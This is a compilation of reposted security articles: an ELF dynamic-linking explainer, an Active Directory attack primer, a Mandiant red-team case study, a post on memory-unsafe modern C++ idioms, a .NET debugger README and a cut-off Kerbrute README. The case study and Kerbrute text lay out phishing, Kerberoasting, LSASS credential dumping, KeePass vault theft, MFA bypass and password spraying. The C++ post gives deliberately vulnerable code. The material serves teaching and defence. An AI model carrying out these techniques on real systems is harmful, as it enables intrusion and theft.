  400410: ff 25 0a 0c 20 00    jmpq *0x200c0a(%rip)   # 601020 <_GLOBAL_OFFSET_TABLE_+0x20>
  400416: 68 01 00 00 00       pushq $0x1
  40041b: e9 d0 ff ff ff       jmpq 4003f0 <_init+0x28>

For each externally defined function, we have an entry in the .plt section. They all look the same and consist of three instructions, except the first entry.
That first entry is special; we will see its use shortly. In printf's PLT entry we find a jump to the value contained at address 0x601018. This address is an entry in the GOT. Let's see the contents of that address.

$ objdump -s a.out | grep -A 3 '.got.plt'
Contents of section .got.plt:
 601000 280e6000 00000000 00000000 00000000  (.`.............
 601010 00000000 00000000 06044000 00000000  ..........@.....
 601020 16044000 00000000                    ..@.....

This is where the magic happens. Except for the first time printf is called, the value at this address is the actual address of the printf function in the C library, and we simply jump to that location. But the first time, something else happens. When printf is called for the first time, the value at this location is the address of the next instruction in printf's PLT entry. As you can see from the listing above, it is 400406, stored in little-endian format. At that location in the PLT entry, we have a push instruction which pushes 0 onto the stack. Each PLT entry has the same push instruction, but each pushes a different number; 0 here denotes the offset of the printf symbol in the relocation table. The push instruction is then followed by a jump to the first instruction of the first PLT entry. Remember from above that the first entry is special: it is here that the dynamic linker is called to resolve the external symbols and relocate them. To do that, we jump to the address contained at 601010 in the GOT. This address should contain the address of the dynamic linker routine that handles relocation. Right now this entry is filled with 0's, but it is filled in when the program actually runs and the kernel invokes the dynamic linker.
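The first-call-resolves, later-calls-jump-direct behaviour can be modeled with a dictionary standing in for the GOT. This is a toy Python model of the control flow, not the real ld.so mechanism:

```python
# Toy model of PLT/GOT lazy binding: the GOT slot for a function starts out
# empty (in the real binary it points back into the PLT stub); the first call
# falls through to the resolver, which patches the GOT so every later call
# jumps straight to the real function.

def real_printf(msg):                 # stands in for printf in libc
    return f"printf: {msg}"

resolved_calls = []                   # records each time the "dynamic linker" runs

def resolver(name, got):
    # stands in for the dynamic linker routine reached via the first PLT entry
    resolved_calls.append(name)
    got[name] = real_printf           # patch the GOT with the real address
    return real_printf

got = {}

def plt_printf(msg):                  # stands in for the printf@plt stub
    target = got.get("printf")
    if target is None:                # first call: go resolve the symbol
        target = resolver("printf", got)
    return target(msg)

plt_printf("first")
plt_printf("second")
assert resolved_calls == ["printf"]   # the resolver ran exactly once
```

The dictionary lookup plays the role of the indirect jmpq through the GOT slot; once the slot is patched, the resolver never runs again.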
When the routine is called, the dynamic linker resolves the symbol whose index was pushed earlier (in our case, 0) from the external shared objects and puts the correct address of the symbol in the GOT. From then on, when printf is called, we don't have to consult the linker; we jump directly from the PLT to the printf function in the C library. This process is called lazy binding. A program may contain many external symbols, but it may not call all of them in one run. So symbol resolution is deferred until actual use, which saves us some program startup time. As you can see from the discussion above, we never had to modify the .plt section, only the .got section. That is why the .plt section is in the first LOAD segment and marked read-only, while the .got section is in the second LOAD segment and marked writable. And this is how the dynamic linker works. I have skipped over lots of gory details; if you are interested in knowing more, you can check out this article.

Let's go back to our program loading. We have already done most of the work. The kernel has loaded all the loadable segments and invoked the dynamic linker. All that is left is to invoke our main function, and that is done by the dynamic linker after it finishes. When it calls our main function, we get the following output in our terminal:

3

And that, my friend, is bliss. Thank you for reading my article. Let me know if you liked it, or if you have any other suggestions for me, in the comments section below. And please, feel free to share.

Sursa: https://kishuagarwal.github.io/life-of-a-binary.html
-
Exploring, Exploiting Active Directory Pen Test

Posted on April 20, 2019 by Rajasekar A

Active Directory is most commonly used in enterprise infrastructure to manage thousands of computers in the organization with a single point of control, the Domain Controller. Penetration testing of Active Directory is particularly interesting, and it is targeted by many APT groups using a wide range of techniques. We will focus on the basics of Active Directory to understand its components before the attack.

Understanding Active Directory and its Components

Directory Service: A directory service is a hierarchical structure which maps the names of all resources in the network to their network addresses. It allows storing, organizing and managing all the network resources and defines a naming structure, making it easier to manage all the devices from a single system.

Active Directory: Active Directory is Microsoft's implementation of directory services. It follows the X.500 specification and works at the application layer of the OSI model. It allows administrators to control all the users and resources in the network from a single server, and it stores information about all the users and resources in a single database, the directory service database. At its core, Active Directory uses Kerberos for authentication of users and LDAP for retrieving directory information.

Domain Controller (DC): A Domain Controller is a Windows server running Active Directory Domain Services in a domain. All the users, user information, computers and their policies are controlled by a Domain Controller. Every user must authenticate with the Domain Controller to access any resource or service in the domain. It defines the policies for all the users: what actions can be performed, what level of privileges is granted, and so on. It makes the life of administrators easy when managing the users and computers in the network.
Naming Conventions in AD:

An Object can be any network resource in the Active Directory domain: computers, users, printers, etc.

A Domain is a logical grouping of objects in the organization. It defines the security boundary and allows objects within the boundary to share data among each other. Information about all the objects within the domain is stored in the domain controller.

A Tree is a collection of one or more domains. All domains within a single tree share a common schema and Global Catalog, which is a central repository of information about all the objects.

A Forest is a collection of one or more trees which share a common directory schema, Global Catalog and configuration across the organization.

Kerberos Authentication:

Kerberos is an authentication protocol used for single sign-on (SSO) purposes. The concept of SSO is to authenticate once and use the resulting token to access any service for which you are authorized. The Kerberos authentication process is as follows:

Step 1: The user sends an Authentication Service Request (AS_REQ) to the Key Distribution Center (KDC) for a Ticket Granting Ticket (TGT), containing the User Principal Name (UPN) and the current timestamp encrypted with a key derived from the user's password.

Step 2: The KDC decrypts the request (AS_REQ) using its local copy of the user's key stored in the database and checks the UPN and timestamp. After verification, it responds with a reply (AS_REP). The reply has two levels of encryption: the TGT, encrypted with the KDC's key, and a session key plus expiry timestamp, encrypted with the hash of the user's password.

Step 3: The user's machine caches the TGT and session key. The TGT is used when requesting a service; the session key is used for further communication with the KDC, which then does not require credentials. All the resources in the domain are available as services and require a service ticket.
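Steps 1 and 2 can be sketched as a toy model. Real Kerberos derives keys with string2key for enctypes such as aes256-cts-hmac-sha1-96 and encrypts an ASN.1-encoded timestamp; here SHA-256 and HMAC stand in for both, purely for illustration:

```python
import hashlib
import hmac

def derive_key(password: str) -> bytes:
    # toy key derivation; real Kerberos uses string2key for the enctype
    return hashlib.sha256(password.encode()).digest()

def as_req_proof(password: str, timestamp: int) -> bytes:
    # the client proves knowledge of the password by protecting the
    # current timestamp with the password-derived key (pre-authentication)
    return hmac.new(derive_key(password), str(timestamp).encode(), hashlib.sha256).digest()

def kdc_verify(stored_key: bytes, timestamp: int, proof: bytes) -> bool:
    # the KDC recomputes the proof with its stored copy of the user's key
    expected = hmac.new(stored_key, str(timestamp).encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, proof)

ts = 1700000000
proof = as_req_proof("S3cret!", ts)
assert kdc_verify(derive_key("S3cret!"), ts, proof)       # correct password: accepted
assert not kdc_verify(derive_key("wrong"), ts, proof)     # wrong password: rejected
```

The timestamp is what stops simple replay: the KDC rejects proofs whose timestamp is too far from its own clock.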
Step4: Now User’s Machine send a request(TGS_REQ) to KDC for Ticket Granting Service(TGS) along with TGT, Service Principle Name(SPN) which contains the name of the service and its IP Address and port number and Timestamp which is encrypted with session key received in Step2. Step5: KDC will decrypt the request with User’s Session Key and checks the SPN, Timestamp and TGT which is encrypted with the KDC password. If all the details are valid, it will send a reply (TGS_REP) with the TGS encrypted with the password hash of the service provider, Ticket Expiry Timestamp encrypted with AS_REP Session key. Step6: User’s machine will decrypt the request with the session key and extract the TGS ticket. User’s Machine will forward this ticket to the Application as a (AP_REQ), the application decrypts the request with its password and extract the session key and other attributes about the client regarding privileges and groups. It verifies these details and grants the access to the application. This is the total process of the Kerberos authentication implemented in the Active Directory. Attacks on Kerberos: Silver Tickets are the Ticket Granting Service (TGS) which is obtained from the KDC can be forged and is effectively cracked offline to compromise the service machine Golden Tickets are the Ticket Granting Ticket (TGT) which is obtained from the KDC on the AS_REP. It can be forged and cracked offline to compromise the KDC Roasting AS-REP can be performed when the server disables DONT_REQ_PREAUTH, an attacker can request the KDC on behalf of the machine and crack the password offline LDAP is a Lightweights Directory Access Protocol which acts as a communication protocol that defines the methods for accessing the directory services in a domain. It defines the way that data should be presented to the users, it includes various components such as Attributes, Entries, and Directory Information Tree. 
Reconnaissance: SPN scanning instead of port-scanning all the machines. Active Directory can be enumerated in multiple ways:

Active Directory can be enumerated even without a domain account.
All domain and forest information, including forest and domain trusts and much more, can be gathered without admin rights.
Privileged accounts and the access rights of all groups can be retrieved using PowerView.

Attacks on AD:

Pass-the-Hash: a technique which passes the NTLM hash of an account to a remote server to log in, rather than the plaintext password.

Pass-the-Cache: passing the cached credentials of Linux/Unix-based systems that are part of the domain to a Windows-based machine to gain access to the system.

Over-Pass-the-Hash: an obtained NTLM hash can be passed to the KDC to obtain a valid Kerberos ticket, which can then be used against another system to gain access.

Maintaining Access in the Domain:

DCSync: requires Domain Admin or Enterprise Admin permissions; the attacker pulls all the password data by requesting replication like a domain controller, allowing them to stay in the domain.

DCShadow: allows registering a rogue domain controller to push new objects into the targeted infrastructure.

There are many more attacks that can be performed to compromise the objects in an enterprise Active Directory infrastructure; I have listed the most commonly performed ones. I have covered the basics of Active Directory and the conventions which are necessary to learn before going on to pen testing. In the next article, I will explain these attacks in detail with practical scenarios.

Image Ref: https://redmondmag.com/articles/2012/02/01/~/media/ECG/redmondmag/Images/2012/02/0212red_Kerberos_Fig1.ashx
-
-
-
-
Finding Weaknesses Before the Attackers Do

April 08, 2019 | by Alyssa Rahman, Curtis Antolik

M-Trends Red Teaming

This blog post originally appeared as an article in M-Trends 2019.

FireEye Mandiant red team consultants perform objectives-based assessments that emulate real cyber attacks by advanced and nation-state attackers across the entire attack lifecycle, blending into environments and observing how employees interact with their workstations and applications. Assessments like this help organizations identify weaknesses in their current detection and response procedures so they can update their existing security programs to better deal with modern threats.

A financial services firm engaged a Mandiant red team to evaluate the effectiveness of its information security team's detection, prevention and response capabilities. The key objectives of this engagement were to accomplish the following actions without detection:

Compromise Active Directory (AD): Gain domain administrator privileges within the client's Microsoft Windows AD environment.
Access financial applications: Gain access to applications and servers containing financial transfer data and account management functionality.
Bypass RSA Multi-Factor Authentication (MFA): Bypass MFA to access sensitive applications, such as the client's payment management system.
Access ATM environment: Identify and access ATMs in a segmented portion of the internal network.

Initial Compromise

Based on Mandiant's investigative experience, social engineering has become the most common and efficient initial attack vector used by advanced attackers. For this engagement, the red team used a phone-based social engineering scenario to circumvent email detection capabilities and avoid the residual evidence that is often left behind by a phishing email.
While performing open-source intelligence (OSINT) reconnaissance of the client's Internet-facing infrastructure, the red team discovered an Outlook Web App login portal hosted at https://owa.customer.example. The red team registered a look-alike domain (https://owacustomer.example) and cloned the client's login portal (Figure 1).

Figure 1: Cloned Outlook Web Portal

After the OWA portal was cloned, the red team identified IT helpdesk and employee phone numbers through further OSINT. Once these phone numbers were gathered, the red team used a publicly available online service to call the employees while spoofing the phone number of the IT helpdesk. Mandiant consultants posed as helpdesk technicians and informed employees that their email inboxes had been migrated to a new company server. To complete the "migration," the employee would have to log into the cloned OWA portal. To avoid suspicion, employees were immediately redirected to the legitimate OWA portal once they authenticated. Using this campaign, the red team captured credentials from eight employees which could be used to establish a foothold in the client's internal network.

Establishing a Foothold

Although the client's virtual private network (VPN) and Citrix web portals implemented MFA that required users to provide a password and RSA token code, the red team found a single-factor bring-your-own-device (BYOD) portal (Figure 2).

Figure 2: Single-factor mobile device management portal

Using stolen domain credentials, the red team logged into the BYOD web portal to attempt enrollment of an Android phone for CUSTOMER\user0. While the red team could view user settings, they were unable to add a new device. To bypass this restriction, the consultants downloaded the IBM MaaS360 Android app and logged in via their phone. The device configuration process installed the client's VPN certificate (Figure 3), which was automatically imported to the Cisco AnyConnect app, also installed on the phone.
Figure 3: Setting up mobile device management

After launching the AnyConnect app, the red team confirmed the phone received an IP address on the client's VPN. Using a generic tethering app from the Google Play store, the red team then tethered a laptop to the phone to access the client's internal network.

Escalating Privileges

Once connected to the internal network, the red team used the Windows "runas" command to launch PowerShell as CUSTOMER\user0 and perform a "Kerberoast" attack. Kerberoasting abuses legitimate features of Active Directory to retrieve service accounts' ticket-granting service (TGS) tickets and brute-force accounts with weak passwords.

To perform the attack, the red team queried an Active Directory domain controller for all accounts with a service principal name (SPN). A typical Kerberoast attack would then request a TGS for the SPN of each associated user account. While Kerberos ticket requests are common, the default Kerberoast attack tool generates an increased volume of requests, which is anomalous and could be flagged as suspicious. Using a keyword search for terms such as "Admin", "SVC" and "SQL," the consultants identified 18 potentially high-value accounts. To avoid detection, the red team retrieved tickets for this targeted subset of accounts and inserted random delays between each request. The Kerberos tickets for these accounts were then uploaded to a Mandiant password-cracking server, which successfully brute-forced the passwords of 4 of the 18 accounts within 2.5 hours.

The red team then compiled a list of Active Directory group memberships for the cracked accounts, uncovering several groups that followed the naming scheme of {ComputerName}_Administrators. The red team confirmed the accounts possessed local administrator privileges to the specified computers by performing a remote directory listing of \\{ComputerName}\C$.
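The targeting step described above, reducing all SPN-bearing accounts to a keyword-matched, high-value subset before requesting any tickets, can be sketched as follows; the account names are invented:

```python
# Filter SPN accounts to a high-value subset before requesting tickets,
# keeping the request volume low enough to blend into normal traffic.
def kerberoast_targets(spn_accounts, keywords=("admin", "svc", "sql")):
    return [a for a in spn_accounts if any(k in a.lower() for k in keywords)]

# invented example inventory, standing in for an LDAP query result
accounts = ["MSSQLSvc/db01", "HTTP/web01", "svc-backup", "AdminPortal/app01", "printer01"]
targets = kerberoast_targets(accounts)
assert targets == ["MSSQLSvc/db01", "svc-backup", "AdminPortal/app01"]
```

In the engagement the red team additionally spaced the per-account ticket requests with random delays, so the filtered list translated into a slow trickle of otherwise ordinary Kerberos traffic.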
The red team also executed commands on the systems using PowerShell Remoting to gather information about logged-on users and running software. After reviewing this data, the red team identified an endpoint detection and response (EDR) agent with the capability to perform in-memory detections, which was likely to identify and alert on the execution of suspicious command-line arguments and parent/child process heuristics associated with credential theft. To avoid detection, the red team created LSASS process memory dumps using a custom utility executed via WMI. The red team retrieved the LSASS dump files over SMB and extracted cleartext passwords and NTLM hashes using Mimikatz.

The red team performed this process on 10 unique systems identified as potentially having active privileged user sessions. From one of these 10 systems, the red team successfully obtained credentials for a member of the Domain Administrators group. With access to this Domain Administrator account, the red team gained full administrative rights for all systems and users in the customer's domain. This privileged account was then used to target several high-priority applications and network segments to demonstrate the risk of such an attack on critical customer assets.

Accessing High-Value Objectives

For this phase, the client identified their RSA MFA systems, ATM network and high-value financial applications as three critical objectives for the Mandiant red team to target.

Targeting Financial Applications

The red team began this phase by querying Active Directory data for hostnames related to the objectives and found multiple servers and databases that included references to their key financial application.
The red team reviewed the files and documentation on financial application web servers and found an authentication log indicating the following users accessed the financial application:

CUSTOMER\user1
CUSTOMER\user2
CUSTOMER\user3
CUSTOMER\user4

The red team navigated to the financial application's web interface (Figure 4) and found that authentication required an "RSA passcode," clearly indicating that access required an MFA token.

Figure 4: Financial application login portal

Bypassing Multi-Factor Authentication

The red team targeted the client's RSA MFA implementation by searching network file shares for configuration files and IT documentation. In one file share (Figure 5), the red team discovered software migration log files that revealed the hostnames of three RSA servers.

Figure 5: RSA migration logs from \\CUSTOMER-FS01\Software

Next, the red team focused on identifying the user who installed the RSA authentication module. The red team performed a directory listing of the C:\Users and C:\data folders of the RSA servers, finding that CUSTOMER\CUSTOMER_ADMIN10 had logged in the same day the RSA agent installer was downloaded. Using these indicators, the red team targeted CUSTOMER\CUSTOMER_ADMIN10 as a potential RSA administrator.

Figure 6: Directory listing output

By reviewing user details, the red team identified that CUSTOMER\CUSTOMER_ADMIN10 was the privileged account corresponding to the standard user account CUSTOMER\user103. The red team then used PowerView, an open-source PowerShell tool, to identify systems in the environment where CUSTOMER\user103 was or had recently been logged in (Figure 7).

Figure 7: Running the PowerView Invoke-UserHunter command

The red team harvested credentials from the LSASS memory of 10.1.33.133 and successfully obtained the cleartext password for CUSTOMER\user103 (Figure 8).
Figure 8: Mimikatz output

The red team used the credentials for CUSTOMER\user103 to log in, without MFA, to the web front-end of the RSA Security Console with administrative rights (Figure 9).

Figure 9: RSA console

Many organizations have audit procedures to monitor for the creation of new RSA tokens, so the red team decided the stealthiest approach would be to provision an emergency tokencode. However, since the client was using software tokens, the emergency tokens still required a user's RSA SecurID PIN. The red team decided to target individual users of the financial application and attempt to discover an RSA PIN stored on their workstations. While the red team knew which users could access the financial application, they did not know the system assigned to each user. To identify these systems, the red team targeted the users through their inboxes: they set a malicious Outlook homepage for the financial application user CUSTOMER\user1 via MAPI over HTTP using the Ruler utility. This ensured that whenever the user reopened Outlook on their system, a backdoor would launch.

Once CUSTOMER\user1 had relaunched Outlook and their workstation was compromised, the red team began enumerating installed programs on the system and identified that the user used KeePass, a common password vaulting solution. The red team performed an attack against KeePass to retrieve the contents of the vault without knowing the master password, by adding a malicious event trigger to the KeePass configuration file (Figure 10). With this trigger, the next time the user opened KeePass, a comma-separated values (CSV) file was created with all the passwords in the KeePass database, and the red team was able to retrieve the export from the user's roaming profile.

Figure 10: Malicious configuration file

One of the entries in the resulting CSV file was the login credentials for the financial application, which included not only the application password, but also the user's RSA SecurID PIN.
With this information, the red team possessed all the credentials needed to access the financial application. The red team logged into the RSA Security Console as CUSTOMER\user103 and navigated to the user record for CUSTOMER\user1. The red team then generated an online emergency access token (Figure 11). The token was configured so that the next time CUSTOMER\user1 authenticated with their legitimate RSA SecurID PIN + tokencode, the emergency access code would be disabled. This was done to remain covert and mitigate any impact on the user's ability to conduct business.

Figure 11: Emergency access token

The red team then successfully authenticated to the financial application with the emergency access token (Figure 12).

Figure 12: Financial application accessed with emergency access token

Accessing ATMs

The red team's final objective was to access the ATM environment, located on a separate network segment from the primary corporate domain. First, the red team prepared a list of high-value users by querying the member list of potentially relevant groups such as ATM_Administrators. The red team then searched all accessible systems for recent logins by these targeted accounts and dumped their passwords from memory. After obtaining a password for ATM administrator CUSTOMER\ADMIN02, the red team logged into the client's internal Citrix portal to access the employee's desktop.

The red team reviewed the administrator's documentation and determined the client's ATMs could be accessed through a server named JUMPHOST01, which connected the corporate and ATM network segments. The red team also found a bookmark saved in Internet Explorer for "ATM Management." While this link could not be accessed directly from the Citrix desktop, the red team determined it would likely be accessible from JUMPHOST01.
The jump server enforced MFA for users attempting to RDP into the system, so the red team used a previously compromised domain administrator account, CUSTOMER\ADMIN01, to execute a payload on JUMPHOST01 through WMI. WMI does not support MFA, so the red team was able to establish a connection between JUMPHOST01 and the red team's CnC server, create a SOCKS proxy, and access the ATM Management application without an RSA PIN. The red team successfully authenticated to the ATM Management application and could then dispense money, add local administrators, install new software and execute commands with SYSTEM privileges on all ATM machines (Figure 13).

Figure 13: Executing commands on ATMs as SYSTEM

Takeaways: Multi-Factor Authentication, Password Policy and Account Segmentation

Multi-Factor Authentication

Mandiant experts have seen a significant uptick in the number of clients securing their VPN or remote access infrastructure with MFA. However, there is frequently a lack of MFA for applications being accessed from within the internal corporate network. Therefore, FireEye recommends that customers enforce MFA for all externally accessible login portals and for any sensitive internal applications.

Password Policy

During this engagement, the red team compromised four privileged service accounts due to the use of weak passwords which could be quickly brute forced. FireEye recommends that customers enforce strong password practices for all accounts. Customers should enforce a minimum of 20-character passwords for service accounts. When possible, customers should also use Microsoft Managed Service Accounts (MSAs) or enterprise password vaulting solutions to manage privileged users.

Account Segmentation

Once the red team obtained initial access to the environment, they were able to escalate privileges in the domain quickly due to a lack of account segmentation. FireEye recommends customers follow the principle of least privilege when provisioning accounts.
Accounts should be separated by role so normal users, administrative users and domain administrators are all unique accounts, even if a single employee needs one of each. Normal user accounts should not be given local administrator access without a documented business requirement. Workstation administrators should not be allowed to log in to servers and vice versa. Finally, domain administrators should only be permitted to log in to domain controllers, and server administrators should not have access to those systems. By segmenting accounts in this way, customers can greatly increase the difficulty of an attacker escalating privileges or moving laterally from a single compromised account.

Conclusion

As demonstrated in this case study, the Mandiant red team was able to gain a foothold in the client's environment, obtain full administrative control of the company domain and compromise all critical business applications without any software or operating system exploits. Instead, the red team focused on identifying system misconfigurations, conducting social engineering attacks and using the client's internal tools and documentation. The red team was able to achieve their objectives due to the configuration of the client's MFA, service account password policy and account segmentation.

Sursa: https://www.fireeye.com/blog/threat-research/2019/04/finding-weaknesses-before-the-attackers-do.html
Modern C++ Won't Save Us

2019-04-21 by alex_gaynor

I'm a frequent critic of memory unsafe languages, principally C and C++, and how they induce an exceptional number of security vulnerabilities. My conclusion, based on reviewing evidence from numerous large software projects using C and C++, is that we need to be migrating our industry to memory safe by default languages (such as Rust and Swift).

One of the responses I frequently receive is that the problem isn't C and C++ themselves; developers are simply holding them wrong. In particular, I often receive defenses of C++ of the form, "C++ is safe if you don't use any of the functionality inherited from C"[1], or similarly that if you use modern C++ types and idioms you will be immune from the memory corruption vulnerabilities that plague other projects.

I would like to credit C++'s smart pointer types, because they do significantly help. Unfortunately, my experience working on large C++ projects which use modern idioms is that these are not nearly sufficient to stop the flood of vulnerabilities. My goal for the remainder of this post is to highlight a number of completely modern C++ idioms which produce vulnerabilities.

Hide the reference use-after-free

The first example I'd like to describe, originally from Kostya Serebryany, is how C++'s std::string_view can make it easy to hide use-after-free vulnerabilities:

#include <iostream>
#include <string>
#include <string_view>

int main() {
  std::string s = "Hellooooooooooooooo ";
  std::string_view sv = s + "World\n";
  std::cout << sv;
}

What's happening here is that s + "World\n" allocates a new std::string, which is then converted to a std::string_view. At this point the temporary std::string is freed, but sv still points at the memory that used to be owned by it. Any future use of sv is a use-after-free vulnerability. Oops! C++ lacks the facilities for the compiler to be aware that sv captures a reference to something where the reference lives longer than the referent.
The same issue impacts std::span, also an extremely modern C++ type. Another fun variant involves using C++'s lambda support to hide a reference:

#include <memory>
#include <iostream>
#include <functional>

std::function<int(void)> f(std::shared_ptr<int> x) {
  return [&]() { return *x; };
}

int main() {
  std::function<int(void)> y(nullptr);
  {
    std::shared_ptr<int> x(std::make_shared<int>(4));
    y = f(x);
  }
  std::cout << y() << std::endl;
}

Here the [&] in f causes the lambda to capture values by reference. Then in main, x goes out of scope, destroying the last reference to the data and causing it to be freed. At this point y contains a dangling pointer. This occurs despite our meticulous use of smart pointers throughout. And yes, people really do write code that handles std::shared_ptr<T>&, often as an attempt to avoid additional increments and decrements on the reference count.

std::optional<T> dereference

std::optional represents a value that may or may not be present, often replacing magic sentinel values (such as -1 or nullptr). It offers methods such as value(), which extracts the T it contains and raises an exception if the optional is empty. However, it also defines operator* and operator->. These methods also provide access to the underlying T, but they do not check whether the optional actually contains a value. The following code, for example, simply returns an uninitialized value:

#include <optional>

int f() {
  std::optional<int> x(std::nullopt);
  return *x;
}

If you use std::optional as a replacement for nullptr this can produce even more serious issues! Dereferencing a nullptr gives a segfault (which is not a security issue, except in older kernels). Dereferencing a nullopt, however, gives you an uninitialized value as a pointer, which can be a serious security issue. While having a T* with an uninitialized value is also possible, these are much less common than dereferencing a pointer that was correctly initialized to nullptr.
And no, this doesn't require you to be using raw pointers. You can get uninitialized/wild pointers with smart pointers as well:

#include <optional>
#include <memory>

std::unique_ptr<int> f() {
  std::optional<std::unique_ptr<int>> x(std::nullopt);
  return std::move(*x);
}

std::span<T> indexing

std::span<T> provides an ergonomic way to pass around a reference to a contiguous slice of memory and a length. This lets you easily write code that works over multiple different types; a std::span<uint8_t> can point to memory owned by a std::vector<uint8_t>, a std::array<uint8_t, N>, or even a raw pointer. Failure to correctly check bounds is a frequent source of security vulnerabilities, and in many senses span helps out with this by ensuring you always have a length handy.

Like all STL data structures, span's operator[] method does not perform any bounds checks. This is regrettable, since operator[] is the most ergonomic and default way people use data structures. std::vector and std::array can at least theoretically be used safely because they offer an at() method which is bounds checked (in practice I've never seen this done, but you could imagine a project adopting a static analysis tool which simply banned calls to std::vector<T>::operator[]). span does not offer an at() method, or any other method which performs a bounds checked lookup. Interestingly, both Firefox and Chromium's backports of std::span do perform bounds checks in operator[], and thus they'll never be able to safely migrate to std::span.

Conclusion

Modern C++ idioms introduce many changes which have the potential to improve security: smart pointers better express expected lifetimes, std::span ensures you always have a correct length handy, std::variant provides a safer abstraction for unions. However, modern C++ also introduces some incredible new sources of vulnerabilities: lambda capture use-after-free, uninitialized-value optionals, and un-bounds-checked span.
My professional experience writing relatively modern C++, and auditing Rust code (including Rust code that makes significant use of unsafe), is that the safety of modern C++ is simply no match for memory safe by default languages like Rust and Swift (or Python and Javascript, though I find it rare in life to have a program that makes sense to write in either Python or C++).

There are significant challenges to migrating existing, large, C and C++ codebases to a different language -- no one can deny this. Nonetheless, the question simply must be how we can accomplish it, rather than if we should try. Even with the most modern C++ idioms available, the evidence is clear that, at scale, it's simply not possible to hold C++ right.

[1] I understood this to be referring to raw pointers, arrays-as-pointers, manual malloc/free, and other similar features. However, I think it's worth acknowledging that, given that C++ explicitly incorporated C into its specification, in practice most C++ code incorporates some of these elements.

Hi, I'm Alex. I'm currently at a startup called Alloy. Before that I was an engineer working on Firefox security and before that at the U.S. Digital Service. I'm an avid open source contributor and live in Washington, DC.

Sursa: https://alexgaynor.net/2019/apr/21/modern-c++-wont-save-us/
Debugger for .NET Core runtime

The debugger provides the GDB/MI or VSCode Debug Adapter protocol and allows debugging .NET apps under the .NET Core runtime.

Build

Switch to the netcoredbg directory, create a build directory and switch into it:

mkdir build
cd build

Proceed to build with cmake. Necessary dependencies (CoreCLR sources and .NET SDK binaries) are going to be downloaded during the CMake configure step. It is possible to override them with the CMake options -DCORECLR_DIR=<path-to-coreclr> and -DDOTNET_DIR=<path-to-dotnet-sdk>.

Ubuntu

CC=clang CXX=clang++ cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin

macOS

cmake .. -DCMAKE_INSTALL_PREFIX=$PWD/../bin

Windows

cmake .. -G "Visual Studio 15 2017 Win64" -DCMAKE_INSTALL_PREFIX="$pwd\..\bin"

Compile and install:

cmake --build . --target install

Run

The above commands create a bin directory with the netcoredbg binary and additional libraries. Now running the debugger with the --help option should look like this:

$ ../bin/netcoredbg --help
.NET Core debugger

Options:
--attach <process-id>                 Attach the debugger to the specified process id.
--interpreter=mi                      Puts the debugger into MI mode.
--interpreter=vscode                  Puts the debugger into VS Code Debugger mode.
--engineLogging[=<path to log file>]  Enable logging to VsDbg-UI or file for the engine.
                                      Only supported by the VsCode interpreter.
--server[=port_num]                   Start the debugger listening for requests on the
                                      specified TCP/IP port instead of stdin/out. If port
                                      is not specified TCP 4711 will be used.

Sursa: https://github.com/Samsung/netcoredbg
Kerbrute

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

Grab the latest binaries from the releases page to get started.

Background

This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the Heimdal Kerberos client from Linux. I wanted something that didn't require privileges to install a Kerberos client, and when I found the amazing pure Go implementation of Kerberos, gokrb5, I decided to finally learn Go and write this.

Bruteforcing Windows passwords with Kerberos is much faster than any other approach I know of, and potentially stealthier, since pre-authentication failures do not trigger the "traditional" An account failed to log on event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller).

For more background and information, check out my Troopers 2019 talk, Fun with LDAP and Kerberos (link TBD).

Usage

Kerbrute has three main commands:

bruteuser - Bruteforce a single user's password from a wordlist
passwordspray - Test a single password against a list of users
userenum - Enumerate valid domain usernames via Kerberos

A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given, the KDC will be looked up via DNS.

By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option.

Output is logged to stdout, but a log file can be specified with -o. By default, failures are not logged, but that can be changed with -v.

Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts.
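The --safe behavior can be pictured with a small concurrency sketch (illustrative Python with a hypothetical try_login stub; Kerbrute itself is written in Go): workers pull credentials from a shared queue until any one of them observes a lockout, at which point a shared flag makes every thread stop.

```python
import threading
from queue import Queue, Empty

stop = threading.Event()  # set as soon as any worker sees a lockout

def try_login(user, password):
    # Hypothetical stub so the sketch runs: pretend one account is locked.
    # A real tool would send a Kerberos pre-auth attempt here instead.
    return "locked" if user == "locked_user" else "failure"

def worker(queue, results):
    while not stop.is_set():
        try:
            user, password = queue.get_nowait()
        except Empty:
            return
        status = try_login(user, password)
        if status == "locked":
            stop.set()  # "--safe": abort every thread, don't lock out more accounts
            return
        results.append((user, password, status))

queue = Queue()
for u in ["user1", "locked_user", "user2"]:
    queue.put((u, "Password123"))

results = []
threads = [threading.Thread(target=worker, args=(queue, results)) for _ in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()
```

After the run, the stop flag is set and the locked account never appears in the results, mirroring the "abort all threads" description above.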
The help command can be used for more information:

$ ./kerbrute

    [kerbrute ASCII art banner]

Version: v1.0.0 (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication. It is designed to be used on an internal Windows domain with access to one of the Domain Controllers. Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

Use "kerbrute [command] --help" for more information about a command.

User Enumeration

To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled.
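The decision logic behind userenum can be sketched from the KRB-ERROR codes defined in RFC 4120 (the numeric constants are from the RFC; the classify function is an illustrative Python sketch, not Kerbrute's actual Go source):

```python
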